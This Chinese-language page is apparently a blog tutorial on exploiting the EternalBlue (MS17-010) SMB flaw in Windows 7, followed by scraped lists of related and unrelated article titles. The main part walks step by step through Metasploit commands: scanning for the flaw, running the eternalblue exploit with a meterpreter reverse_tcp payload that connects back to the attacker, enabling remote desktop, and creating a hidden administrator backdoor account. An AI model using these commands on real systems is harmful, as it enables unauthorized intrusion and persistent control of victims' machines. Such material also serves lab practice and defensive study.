永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

其中漏洞编号为MS17-010,利用多个SMB远程代码执行漏洞,可在无交互的情况下获取系统最高权限,又为远程代码任意执行。

步骤一:使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝漏洞模块...

search ms17-010

步骤二:使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试...

>>>use  auxiliary/scanner/smb/smb_ms17_010       /模块调用或者使用use 3对搜索出来的模块进行调用...
>>>set  rhost  192.168.202.131                   //设置目标地址
>>>set  rport  445                               //设置目标端口
>>>show options                                  //显示要设置的选项
>>>run                                           //开始运行此模块

步骤三:通过辅助模块扫描可以发现目标系统存在永恒之蓝漏洞,并开始调用漏洞利用模块按照以下参数来进行攻击...

>>>Use exploit/windows/smb/ms17_010_eternalblue      //调用ms17_010漏洞利用模块
>>>Set payload windows/x64/meterpreter/reverse_tcp   //设置payload
>>>Set RHOST  受害者IP地址                            //设置攻击目标的IP地址
>>>Set LHOST  反弹payload的IP地址                     //这是反弹的IP地址,即攻击者的IP地址
>>>Exploit                                           //漏洞攻击

步骤四:攻击成功后获取一个Meterpreter会话....使用以下命令在Meterpreter会话开启目标主机的3389端口并进入到目标Shell中创建后门账号...

meterpreter>run getgui -e                                                                             //开启目标机器远程桌面服务器
meterpreter>shell                                                                                                    //进入到目标机器的CMD环境当中
C:\Windows\system32>net user warsec 123admiN@ /add                //创建后门账号
C:\Windows\system32>net localgroup administrators warsec /add     //将后门账号添加到管理员组当中
>>>rdesktop 192.168.0.19                                          //远程桌面到目标机器

永恒之蓝--Windows7相关推荐

  1. 永恒之蓝windows7:445端口漏洞

    首先我们来了解一下windows下445端口的作用,445端口是SMB服务端口. SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件.打印机 ...

  2. 永恒之蓝勒索漏洞复现

    下载2017没下补丁前的window7版本 然后先查看本机ip 192.168.140.130 先找一下我们目前局域网存在的可能被我们攻击的主机. 首先使用 nmap 命令扫描局域网内的所有主机(因为 ...

  3. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  4. MS17-010永恒之蓝漏洞的简谈与利用

    MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...

  5. Windows下永恒之蓝(MS17-010)漏洞的复现分析

    一.漏洞简介 1.爆发于17年左右,一种名为WannaCry(永恒之蓝)的电脑勒索病毒,基于SMB协议,利用开放TCP445端口的机器进行攻击,只要机主开机联网,就可通过漏洞来控制主机,植入木马,窃取 ...

  6. MSF-17010(永恒之蓝)复现

    最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现 所需环境VMware,两台主机使用NAT模式连接 kali 192.168.249.129 windows7 192.168.249.130 ...

  7. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  8. 永恒之蓝漏洞ms17-010

    本示例主要提供学习使用,不得用于违法犯罪 目录 什么是永恒之蓝 漏洞复现: 1.信息收集 2.进入MSF利用永恒之蓝漏洞模块 3.后渗透阶段 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团 ...

  9. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  10. 永恒之蓝漏洞复现MS17-010

    一.简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝"利 ...

最新文章

  1. C++宏assert()
  2. 当RxJava遇到AOP
  3. pytroch 中Variable实现线性回归
  4. python爬虫lxml xpath测试
  5. Item Pipeline
  6. Java使用iText生成word文件的完美解决方案(亲测可行)
  7. Nodejs模块初始化
  8. 【报告分享】罗兰贝格2019年关于人工智能的十个议题.pdf(附下载链接)
  9. linux交换分区swap分区的构建
  10. Springboot之添加本地模块依赖
  11. 极坐标潮流计算matlab,基于Matlab矩阵运算的潮流计算导纳矩阵计算方法与流程
  12. VMware 的安装和破解密码
  13. 六款超好用的大数据分析工具
  14. TCP: too many of orphaned sockets错误
  15. 华为、字节跳动、蔚来、康师傅、法雷奥、AIG等公司高管变动
  16. C语言七巧板游戏制作,绘本里的七巧板游戏
  17. laravel8 改变分页样式
  18. 现代控制理论2——状态空间分析法
  19. c语言 json 请求_C语言处理json字符串
  20. android 流媒体 播放器 项目 源码

热门文章

  1. 代码重构(一)原理和规范
  2. transform.forward和vector3.forward的使用区别
  3. 帝国cms html5 编辑器,帝国cms后台编辑器自动排版插件
  4. 计算机设备管理器命令,打开设备管理器的命令,教你一分钟学会最简单
  5. java罗马帝国下载,Java程序设计2020满分完整版考 试题库大全
  6. App Inventor探索
  7. LibreOffice 宏
  8. 16S测序 生物信息数据处理
  9. Pandas拼接、数据分析实操
  10. 树莓派(Raspberry Pi)——为树莓派安装系统及常用工具下载地址